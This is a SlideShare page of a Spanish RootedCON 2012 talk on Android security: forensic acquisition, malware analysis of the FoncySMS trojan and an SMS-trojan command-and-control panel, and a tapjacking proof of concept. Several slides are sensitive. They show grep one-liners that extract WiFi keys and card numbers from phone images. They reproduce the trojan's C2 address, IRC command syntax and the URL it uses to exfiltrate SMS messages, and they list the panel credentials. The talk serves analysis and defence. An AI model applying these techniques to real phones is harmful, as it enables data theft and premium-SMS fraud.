SlideShare una empresa de Scribd logo

Pimp your Android. Rooted CON 2012.

Internet Security Auditors
Internet Security Auditors

Esta presentación hace un repaso sobre la seguridad en plataformas android, donde se profundiza en aspectos como: análisis estático de aplicaciones, análisis dinámico, análisis forense, detección de malware, descubrimiento de vulnerabilidades 0-day y desmantelamiento de centros de control de botnets.

Sector inmobiliario
1 de 48
Descargar para leer sin conexión
Pimp your Android Sebastián Guerrero – sguerrero@isecauditors.com
Agenda • Introducción • Montando lab de investigación. • Trasteando con aplicaciones. • Análisis forense. • Formar un zoológico de malware. • Evolución del malware. • Medidas de seguridad. • Reverseemos algo nuevo. • Desmantelando un C&C • It’s 0-day time. 2
Arquitectura
Fichero APK • Es un fichero .zip falso • Usado para empacar las aplicaciones • Todo APK incluye: • classes.dex • resources.asc • /res • /META-INF • AndroidManifest.xml
AndroidManifest
Montando un laboratorio • Utilizar la ISO Android Reverse Engineering (A.R.E.) • Herramientas como Androguard, APKInspector, Apktool, AxmlPrinter, Dex2Jar, etc… • Espacio de trabajo ya configurado. • Ideal para máquinas virtuales. • Utilizar uno de los ports de Androix-x86. • Proyecto OpenSource. • Sistema operativo Android. • Entorno fácilmente configurable. • Fluidez. • Crearnos un lab a nuestra medida.
Trasteando con aplicaciones aksmali mali nderstand ndroidSDK Eclipse netbeans ex2jar JD-gui proguArdwireshark
Montando un análisis dinámico 1. Creamos una máquina virtual usando el SDK. 2. Lanzamos el emulador y almacenamos las conexiones en un pcap: • emulator –port n @device-name –tcpdump foo.pcap 3. Instalamos la aplicación • adb install appname.apk 4. Lanzamos pruebas sobre el dispositivo y la aplicación • adb shell monkey –v –p package.app n 5. Leemos los logs • adb shell logcat –d 6. Podemos apoyarnos en Wireshark para leer los logs de conexiones.
Simulando eventos • Llamadas de teléfono • gsm call p-n • gsm accept p-n • gsm cancel p-n • SMS • sms send prefix-number text • Emular velocidad de red • netspeed gsm n • netspeed umts n • Cambiar coordenadas GPS • geo fix -13… 21…
Modus Operandi 1. AXMLPrinter2 – Extraemos la información del AndroidManifest.xml 2. Dex2jar – Convertimos el fichero .dex en un fichero de clases .jar. JAD – Transformamos los ficheros .class en ficheros .jad 3. JDgui – Leemos el código almacenado en el fichero .jar. 4. Understand – Análisis estático del código. 5. Wireshark – Análisis dinámico del código.
Analizando la memoria • Trabajamos con arquitectura ARM • Dividida en cinco capas distintas • Cada modelo es diferente, con aplicaciones específicas. • Herramientas de pago. • ¿Qué podemos toquetear aquí? – Tarjeta SIM. – Memoria física (Interna&Externa). – Memoria volátil. (1) Proyecto Android-x86 http://www.android-x86.org/
Analizando la memoria • ¿Qué requisitos necesito? – Indispensable ser root en el teléfono: – Tener disponible el Android Debug Driver (ADB) – Es recomendable tener instalado un servicio SSH o FTP • ¿Por dónde empiezo? – Conocer cómo está estructurado el sistema. – Saber cuáles son los directorios asociados a los diferentes puntos de montaje. – Realizar la correlación (NanDroid || (DD && ADB pull)) • ¿Qué técnicas empleo? – Uso de strings y búsqueda de cadenas. – Análisis de las bases de datos. – File carving. – Análisis del sistema de ficheros.
Tarjeta SIM • Información a obtener • Número IMSI. • Información sobre localización. • Información sobre tráfico SMS. • Información sobre proveedor. • Información sobre llamadas. • Dispositivo DEKART (35€ ~ 60€) • Características • Dispositivo lectura/escritura USB. • Hace copias de seguridad. • Permite exportar la agenda • Aplicaciones • MOBILedit! • Forensic Card Reader • Oxygen • USIM Detective.
Una de strings • Claves WiFi – strings userdata.img | grep psk= • Correos electrónicos – strings userdata.img | egrep “[a-z A-Z_-.]+@[a-z A-Z-.]+.[a-z A-Z-.]+” • Imágenes JPG – strings data.img | grep -oE "(.*.jpe?g|.*.JPE?G)" • Inicios de sesión – Strings userdata.img | grep –n10 “login” • Números de teléfono – strings userdata.img | grep -oE "([0-9]{9})" • Tarjetas de crédito – strings userdata.img | grep -oE "^((4d{3})|(5[1-5]d{2})|(6011))-?d{4}-?d{4}- ?d{4}|3[4,7]d{13}$"
Una de BBDDs • Constituye un alto porcentaje del análisis forense. • Toda la información relevante y sensible se encuentra almacenada en estos ficheros. • Suelen encontrarse en /data/data • Backup con adb pull / SSH / FTP / Terminal Emulator… • Consultamos con SQLite3 / SQLviewer…
Encryp… What the fcuk! • Llamadas realizadas (com.android.providers.contacts/databases – contacts2.db) • Mensajes (com.android.providers.telephony/databases – mmssms.db) • Whatsapp (com.whatsapp/databases - mgstore.db – wa.db) • Tuenti
Encryp… What the fcuk! • Configuración de email (com.google.android.email/databases – EmailProvider.db) • Delicious (Fichero xml) • Facebook
La memoria volátil • Debemos de realizar sin tratar de alterar el estado actual del dispositivo. – No podemos apagar o reiniciar el terminal. – Nada de instalar o eliminar aplicaciones. – Cortar todo tipo de acceso a la red. – Modo avión. • Necesitamos ser root. • No disponemos de ninguna API que permita realizar esta labor. • ¿Soluciones? – No es posible acceder a /dev/mem por problemas de seguridad. – Emular dispositivo en /dev/fmem no es posible en Android • Función page_is_ram para comprobar si el desplazamiento a realizar pertenece a la memoria física o no, no existe en arquitectura ARM. • La herramienta DD sólo almacena enteros de 32 bits y desplazamientos más allá de 0x80000000 causan un integer overflow • Volatilitux al poder
Volatilitux • Pslist – Listado de los procesos que andan ejecutándose en memoria • Memmap – Mapa de memoria de un proceso. • Memdmp – Memoria direccionable de un proceso. • Filedmp – Dumpea un fichero abierto • Filelist – Muestra ficheros abiertos para un proceso dado
Si pierdes el teléfono…
Montando SelwoMarina • Android Market • Markets alternativos. – Aptoide – Blapkmarket – snappzmarket • Páginas de aplicaciones. – Mobilism.org – DroidAppz – AndroidFreeware – MalwareDump – Bazaar • Aplicaciones de terceros • Exploits
Montando Selwomarina • Organización de información • Almacenamiento y búsqueda por características de las muestras. • Tamaño, tipo, md5, sha1, tags, fechas… • Obtener, almacenar y recuperar elementos de las muestras. • Ficheros generados, Binarios desempaquetados, Exploits, cadenas embebidas. • Almacenar, buscar y devolver información sobre análisis • IDA Pro BD, notas de análisis, artículos y referencias, muestras de red, sistemas • Detección de firmas • Análisis automatizado • Diseño modularizado. • Características de análisis estático • Soporte de múltiples análisis de malware. • Aislamiento de entornos de análisis dinámico.
Evolución del malware Nombre Características Riesgo AndroidOS.FakePlayer.a AndroidOS_Droisnake.A AndroidOS.FakePlayer.b AndroidOS.FakePlayer.c Android.Geinimi Android.HongTouTou Android.Pjapps Android.DroidDream Android.BgServ Android.Zeahache Android.Walkinwat Android.Adsms Android.Zsone Android.Spacem Android.LightDD Android/DroidKungFu.A Nombre Características Riesgo Android.Basebridge Android.Uxipp Andr/Plankton-A Android.Jsmshider Android.GGTracker Android.KungFu Variants AndroidOS_Crusewin.A AndroidOS_SpyGold.A DroidDream Light Variant Android.Smssniffer Android.HippoSMS Android.Fokonge Android/Sndapps.A Android.Nickispy Android.Lovetrap Android.Premiumtext Android.NickiBot
Vectores de ataque • Amenazas basadas en aplicaciones • Malware • Spyware • Amenazas de privacidad • Vulnerabilidades en aplicaciones • Amenazas basadas en la web • Phishing • Drive-by-downloads • Exploits en navegadores • Amenazas basadas en las redes • Exploits para protocolos de red • Wi-fi sniffing • Amenazas físicas • Pérdida o robo del dispositivo
Medidas de seguridad • Da igual si somos usuarios o una entidad corporativa. • Los malos vienen a hacer daño. • Tenemos un tesoro entre nuestras manos. • Somos el eslabón débil. • Toda nuestra vida online (emails, banca, redes sociales, privacidad) está en nuestro teléfono.
Medidas de seguridad • Canal de comunicación a través de VPN y enrutar todo el tráfico. • Implementar política de contraseñas fuerte. • Deshabilitar servicios y dispositivos inseguros/innecesarios (GPS/Bluetooth/SDCard/etc…). • Capas de seguridad adicionales • Herramientas de privacidad, antivirus, borrado remoto, localización por GPS. • Deshabilitar instalación de software de terceros. • Habilitar servicios de acceso remoto; SSH, FTP, DropBear, etc…
Analizando algo nuevo • Android.FoncySMS • Kaspersky • Risk Level 1: Muy bajo • Descubierto: 15 Enero, 2012 • Actualizado: 30 Enero, 2012 • Actividad: com.android.bot • Descargas: 3370~
Información • Investigada por la OCLCTIC. • Investigación durante 2 meses. • “Banda” compuesta por dos miembros (“Cerebro” y técnico). • Envía SMS premium (4.5€). • 100.000€ 20/30€ por cabeza. • Se ha cobrado 2.000 víctimas desde verano del 2011. • Ciudades europeas y Canadá.
Lista de permisos • android.permission.READ_LOGS • android.permission.READ_PHONE_STATE • android.permission.WRITE_EXTERNAL_STORAGE • android.permission.INTERNET • android.permission.VIBRATE • android.permission.WAKE_LOCK • android.permission.ACCESS_WIFI_STATE • android.permission.CHANGE_WIFI_STATE • android.permission.CHANGE_NETWORK_STATE • android.permission.ACCESS_NETWORK_STATE • android.permission.MODIFY_AUDIO_SETTINGS com.android.vending.CHECK_LICENSE
Instalando la app • Iniciar emulador • Instalar la aplicación. • Revisar el estado actual. • Simular actividad. • Observar el nuevo estado. • Analizar
Primer acercamiento
Preparando el terreno
Estructura de la aplicación • Tras la ejecución inicial… • Boomsh – ELF -32 bits LSB executable, ARM version 1 (SYSV), dynamically linked (uses shared library). • Border01.png – Zip archive data. • Footer01.png – ELF -32 bits LSB executable, ARV version 1 (SYSV), dynamically linked (uses shared libs). • Header01.png – ELF – 32bits LSB executable, ARM version 1 (SYSV), dinamically linked (uses shared library). • Rooted - Text file.
Footer.png 1. Deja constancia de que el exploit ha tenido éxito. 2. Modifica los permisos de border01 a lectura/escritura (propietario) y escritura (resto). 3. Instala border01 lanzando el administrador de paquetes
Footer.png (Round 2) • IRCConnect – Conectar con un servidor IRC. • IRCGenUser – Genera un usuario apoyándose en rand(). • IRCHandler – Manejador de errores. • IRCLogin – Establece sesión con el canal IRC. • IRCPrivmsgParse&IRCParseLine – Parsean las órdenes recibidas. • IRCSend – Realiza envío de mensajes.
Footer (La chicha) 1. Establece conexión con 192.68.196.198. 2. Genera nombre de usuario al azar. 3. Se conecta al canal #andros. 4. Queda a la escucha de recibir órdenes. 5. Parsea las líneas que comienza por PRIVMGS
Oído cocina • Comandos a ejecutar – PRIVMGS #andros :[SH] - %COMMAND_TO_RUN% – PRIVMGS #andros :[ID] - %REAL_USER_ID% – PRIVMGS #andros :[EXIT] – exiting ordered…
Border01 • Permisos sospechosos – android.permission.RECEIVE_SMS – android.permission.SEND_SMS – android.permission.INTERNET
AndroidMeActivity 1. Al iniciar la actividad se solicita el código ISO de la ciudad. 2. En base a esto, se establece un número premium u otro. 3. Se realizan 5 envíos a dicho número. • Ciudades a las que realiza el envío • Spain Number: 35024 Message: GOLD • Great Britain Number: 60999 Message: SP2 • Morocco Number: 2052 Message: CODE • Sierra Leone Number: 7604 Message: PASS • Romania Number: 1339 Message: PASS • Norway Number: 2227 Message: PASS • Sweden Number: 72225 Message: PASS • United States Number: 23333 Message: PASS
SMSReceiver 1. Se encarga de la lógica del envío de mensajes. 2. Se reservan dos campos; uno para el número del destinatario y otro para el contenido. 3. Sí el SMS provece del número 81083, 3075, 64747, 60999, 63000, 35024, 2052, 7064, 1339, 9903, 2227, 72225, 23333, el broadcast se corta. 4. Establece conexión con 46.166.146.102 y envía el SMS recibido y el número de origen. 1. http://46.166.146.102/?=STR2(cuerpo mensaje)///STR1(número)
IRC Botnet • Servidor: Irc.anonops.li / 6667 • Canal: #xxx • User: user • Pass: pass
“Desmontando cúpulas” • ¿Objetivo? – Mostrar cómo está organizado y pensado un pequeño y simple C&C para Android. • ¿Qué malware? – Simple Android SMS Trojan. • ¿Funcionamiento? 1. Se instala en el teléfono una aplicación infectada. 2. Espera a que se realice la activación. 3. Se forma un string con el IMEI del usuario y su teléfono. 4. Se envía al C&C y se almacena en una BBDD.
Estructura • BBDD: admin_123/123 • Panel: root/entermoney77 • Infecta varias plataformas – Android: mms.apk – Symbian – Nokia s60v3, s60v5 – mms.sis – Resto de plataformas con soporte java – mms.jar
Contenido • Almacena la siguiente información: – Fecha infección. – IMEI teléfono. – OS. – IP. – País – Número – Texto • Panel en ruso y sólo registra teléfonos de Rusia. • Procedencia rusa.
TapJacking • Vulnerabilidad Touch-Event Hijacking • Mostramos al usuario una interfaz tapadera. • Podemos obligar al usuario a: – Pagarnos unas vacaciones. – Obtener todos los datos del teléfono. – Capturar los movimientos del dispositivo. – Instalar aplicaciones saltándonos los permisos. – Creatividad… • Basada en toasts. • Bueno… ¿Y Google?
Funcionamiento
¿Cómo está organizado? • Se han diseñado un total de 4 payloads • CallPayload.java – Realiza llamadas al número de indicado. • MarketPayload.java – Descarga e instala aplicaciones del market. • ResetPayload.java – Devuelve al estado de fábrica el teléfono. • SMSPayload.java – Envía un mensaje de texto al número indicado. • TweetPayload.java – Publica un tweet en una cuenta de usuario con sesión iniciada. • http://twitter.com/home?status=Yo me he comida más de una concha Codan por día • Está diseñado para que se puedan añadir payloads por el usuario de forma sencilla. • La estructura interna es la siguiente: • Main.java – Ejecuta el servicio y carga los payloads. • MalwarePayload.java – Abstracción para implementar más fácilmente los payloads. • MalwareService.java – Crea el toast e inicia el proceso de tap-jack. • main.xml – Tiene el layout de la aplicación, lanzando con un evento onClick cada payload. • strings.xml – Contiene las cadenas que son utilizadas en la aplicación.
¿Preguntas? ¡MUCHAS GRACIAS! @0xroot

Recomendados

Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...RootedCON
 
Oscar Juarez - Iniciación al análisis de malware [rooted2018]
Oscar Juarez - Iniciación al análisis de malware [rooted2018]Oscar Juarez - Iniciación al análisis de malware [rooted2018]
Oscar Juarez - Iniciación al análisis de malware [rooted2018]RootedCON
 
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]Marc Fernandez - Auditando aplicaciones iOS [rooted2018]
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]RootedCON
 
Forensic iOS
Forensic iOSForensic iOS
Forensic iOSGissim
 
Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]RootedCON
 
Jesús Alcalde & Daniel Gonzalez- - OSINT: La verdad está ahí fuera [rooted2018]
Jesús Alcalde & Daniel Gonzalez- - OSINT: La verdad está ahí fuera [rooted2018]Jesús Alcalde & Daniel Gonzalez- - OSINT: La verdad está ahí fuera [rooted2018]
Jesús Alcalde & Daniel Gonzalez- - OSINT: La verdad está ahí fuera [rooted2018]RootedCON
 
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]RootedCON
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la GuerraLuis Cortes Zavala
 

Recomendados

Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...RootedCON
 
Oscar Juarez - Iniciación al análisis de malware [rooted2018]
Oscar Juarez - Iniciación al análisis de malware [rooted2018]Oscar Juarez - Iniciación al análisis de malware [rooted2018]
Oscar Juarez - Iniciación al análisis de malware [rooted2018]RootedCON
 
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]Marc Fernandez - Auditando aplicaciones iOS [rooted2018]
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]RootedCON
 
Forensic iOS
Forensic iOSForensic iOS
Forensic iOSGissim
 
Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]RootedCON
 
Jesús Alcalde & Daniel Gonzalez- - OSINT: La verdad está ahí fuera [rooted2018]
Jesús Alcalde & Daniel Gonzalez- - OSINT: La verdad está ahí fuera [rooted2018]Jesús Alcalde & Daniel Gonzalez- - OSINT: La verdad está ahí fuera [rooted2018]
Jesús Alcalde & Daniel Gonzalez- - OSINT: La verdad está ahí fuera [rooted2018]RootedCON
 
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]RootedCON
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la GuerraLuis Cortes Zavala
 
Marcos Fuentes - De cero a DFIR (Forense) [rooted2018]
Marcos Fuentes - De cero a DFIR (Forense) [rooted2018]Marcos Fuentes - De cero a DFIR (Forense) [rooted2018]
Marcos Fuentes - De cero a DFIR (Forense) [rooted2018]RootedCON
 
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...RootedCON
 
Tacita, análisis de APKS y big data
Tacita, análisis de APKS y big dataTacita, análisis de APKS y big data
Tacita, análisis de APKS y big dataQuantiKa14
 
Seguridad con herramientas libres 1
Seguridad con herramientas libres 1Seguridad con herramientas libres 1
Seguridad con herramientas libres 1jmariachi
 
Forense android
Forense androidForense android
Forense androidRafael Seg
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)Jaime Sánchez
 
¿Qué esconde tu teléfono? Adquisición forense de dispositivos Android
¿Qué esconde tu teléfono? Adquisición forense de dispositivos Android¿Qué esconde tu teléfono? Adquisición forense de dispositivos Android
¿Qué esconde tu teléfono? Adquisición forense de dispositivos AndroidSEINHE
 
Hack&beers 2015 - Vulnerabilidades animadas de ayer y hoy. Vicente Aguilera
Hack&beers 2015 - Vulnerabilidades animadas de ayer y hoy. Vicente AguileraHack&beers 2015 - Vulnerabilidades animadas de ayer y hoy. Vicente Aguilera
Hack&beers 2015 - Vulnerabilidades animadas de ayer y hoy. Vicente AguileraInternet Security Auditors
 
(ISC)2 Security Congress EMEA. You are being watched.
(ISC)2 Security Congress EMEA. You are being watched.(ISC)2 Security Congress EMEA. You are being watched.
(ISC)2 Security Congress EMEA. You are being watched.Internet Security Auditors
 
CIBERSEG'16. Técnicas #OSINT
CIBERSEG'16. Técnicas #OSINTCIBERSEG'16. Técnicas #OSINT
CIBERSEG'16. Técnicas #OSINTInternet Security Auditors
 
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones Android
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones AndroidCIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones Android
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones AndroidInternet Security Auditors
 
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...Internet Security Auditors
 
Sebastián Guerrero - Pimp your Android [RootedCON 2012]
Sebastián Guerrero - Pimp your Android [RootedCON 2012]Sebastián Guerrero - Pimp your Android [RootedCON 2012]
Sebastián Guerrero - Pimp your Android [RootedCON 2012]RootedCON
 
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...Internet Security Auditors
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...RootedCON
 
Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014Julian Maximiliano Zarate
 
3604299 analisis-criminalistico-forense-con-oss
3604299 analisis-criminalistico-forense-con-oss3604299 analisis-criminalistico-forense-con-oss
3604299 analisis-criminalistico-forense-con-ossSykrayo
 
Ingeniería Inversa en Android. Rooted Labs. Rooted CON 2012.
Ingeniería Inversa en Android. Rooted Labs. Rooted CON 2012.Ingeniería Inversa en Android. Rooted Labs. Rooted CON 2012.
Ingeniería Inversa en Android. Rooted Labs. Rooted CON 2012.Internet Security Auditors
 
Curso forensics power_tools
Curso forensics power_toolsCurso forensics power_tools
Curso forensics power_toolspsanchezcordero
 
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]RootedCON
 
Malware intelligence ppt-slides
Malware intelligence ppt-slidesMalware intelligence ppt-slides
Malware intelligence ppt-slidesSebastián Guerrero Selma
 
Informatica forense: Recuperación de la Evidencia Digital.
Informatica forense: Recuperación de la Evidencia Digital.Informatica forense: Recuperación de la Evidencia Digital.
Informatica forense: Recuperación de la Evidencia Digital.Internet Security Auditors
 

Más contenido relacionado

La actualidad más candente

Marcos Fuentes - De cero a DFIR (Forense) [rooted2018]
Marcos Fuentes - De cero a DFIR (Forense) [rooted2018]Marcos Fuentes - De cero a DFIR (Forense) [rooted2018]
Marcos Fuentes - De cero a DFIR (Forense) [rooted2018]RootedCON
 
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...RootedCON
 
Tacita, análisis de APKS y big data
Tacita, análisis de APKS y big dataTacita, análisis de APKS y big data
Tacita, análisis de APKS y big dataQuantiKa14
 
Seguridad con herramientas libres 1
Seguridad con herramientas libres 1Seguridad con herramientas libres 1
Seguridad con herramientas libres 1jmariachi
 
Forense android
Forense androidForense android
Forense androidRafael Seg
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)Jaime Sánchez
 
¿Qué esconde tu teléfono? Adquisición forense de dispositivos Android
¿Qué esconde tu teléfono? Adquisición forense de dispositivos Android¿Qué esconde tu teléfono? Adquisición forense de dispositivos Android
¿Qué esconde tu teléfono? Adquisición forense de dispositivos AndroidSEINHE
 

La actualidad más candente (7)

Marcos Fuentes - De cero a DFIR (Forense) [rooted2018]
Marcos Fuentes - De cero a DFIR (Forense) [rooted2018]Marcos Fuentes - De cero a DFIR (Forense) [rooted2018]
Marcos Fuentes - De cero a DFIR (Forense) [rooted2018]
 
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
 
Tacita, análisis de APKS y big data
Tacita, análisis de APKS y big dataTacita, análisis de APKS y big data
Tacita, análisis de APKS y big data
 
Seguridad con herramientas libres 1
Seguridad con herramientas libres 1Seguridad con herramientas libres 1
Seguridad con herramientas libres 1
 
Forense android
Forense androidForense android
Forense android
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
 
¿Qué esconde tu teléfono? Adquisición forense de dispositivos Android
¿Qué esconde tu teléfono? Adquisición forense de dispositivos Android¿Qué esconde tu teléfono? Adquisición forense de dispositivos Android
¿Qué esconde tu teléfono? Adquisición forense de dispositivos Android
 

Destacado

Hack&beers 2015 - Vulnerabilidades animadas de ayer y hoy. Vicente Aguilera
Hack&beers 2015 - Vulnerabilidades animadas de ayer y hoy. Vicente AguileraHack&beers 2015 - Vulnerabilidades animadas de ayer y hoy. Vicente Aguilera
Hack&beers 2015 - Vulnerabilidades animadas de ayer y hoy. Vicente AguileraInternet Security Auditors
 
(ISC)2 Security Congress EMEA. You are being watched.
(ISC)2 Security Congress EMEA. You are being watched.(ISC)2 Security Congress EMEA. You are being watched.
(ISC)2 Security Congress EMEA. You are being watched.Internet Security Auditors
 
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones Android
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones AndroidCIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones Android
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones AndroidInternet Security Auditors
 
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...Internet Security Auditors
 
Sebastián Guerrero - Pimp your Android [RootedCON 2012]
Sebastián Guerrero - Pimp your Android [RootedCON 2012]Sebastián Guerrero - Pimp your Android [RootedCON 2012]
Sebastián Guerrero - Pimp your Android [RootedCON 2012]RootedCON
 
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...Internet Security Auditors
 

Destacado (7)

Hack&beers 2015 - Vulnerabilidades animadas de ayer y hoy. Vicente Aguilera
Hack&beers 2015 - Vulnerabilidades animadas de ayer y hoy. Vicente AguileraHack&beers 2015 - Vulnerabilidades animadas de ayer y hoy. Vicente Aguilera
Hack&beers 2015 - Vulnerabilidades animadas de ayer y hoy. Vicente Aguilera
 
(ISC)2 Security Congress EMEA. You are being watched.
(ISC)2 Security Congress EMEA. You are being watched.(ISC)2 Security Congress EMEA. You are being watched.
(ISC)2 Security Congress EMEA. You are being watched.
 
CIBERSEG'16. Técnicas #OSINT
CIBERSEG'16. Técnicas #OSINTCIBERSEG'16. Técnicas #OSINT
CIBERSEG'16. Técnicas #OSINT
 
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones Android
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones AndroidCIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones Android
CIBERSEG '15 - Taller: Ingeniería inversa en aplicaciones Android
 
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
 
Sebastián Guerrero - Pimp your Android [RootedCON 2012]
Sebastián Guerrero - Pimp your Android [RootedCON 2012]Sebastián Guerrero - Pimp your Android [RootedCON 2012]
Sebastián Guerrero - Pimp your Android [RootedCON 2012]
 
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
 

Similar a Pimp your Android. Rooted CON 2012.

rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...RootedCON
 
Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014Julian Maximiliano Zarate
 
3604299 analisis-criminalistico-forense-con-oss
3604299 analisis-criminalistico-forense-con-oss3604299 analisis-criminalistico-forense-con-oss
3604299 analisis-criminalistico-forense-con-ossSykrayo
 
Ingeniería Inversa en Android. Rooted Labs. Rooted CON 2012.
Ingeniería Inversa en Android. Rooted Labs. Rooted CON 2012.Ingeniería Inversa en Android. Rooted Labs. Rooted CON 2012.
Ingeniería Inversa en Android. Rooted Labs. Rooted CON 2012.Internet Security Auditors
 
Curso forensics power_tools
Curso forensics power_toolsCurso forensics power_tools
Curso forensics power_toolspsanchezcordero
 
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]
David Barroso - iPhone + Botnets = FUN! [RootedCON 2010]RootedCON
 
Informatica forense: Recuperación de la Evidencia Digital.
Informatica forense: Recuperación de la Evidencia Digital.Informatica forense: Recuperación de la Evidencia Digital.
Informatica forense: Recuperación de la Evidencia Digital.Internet Security Auditors
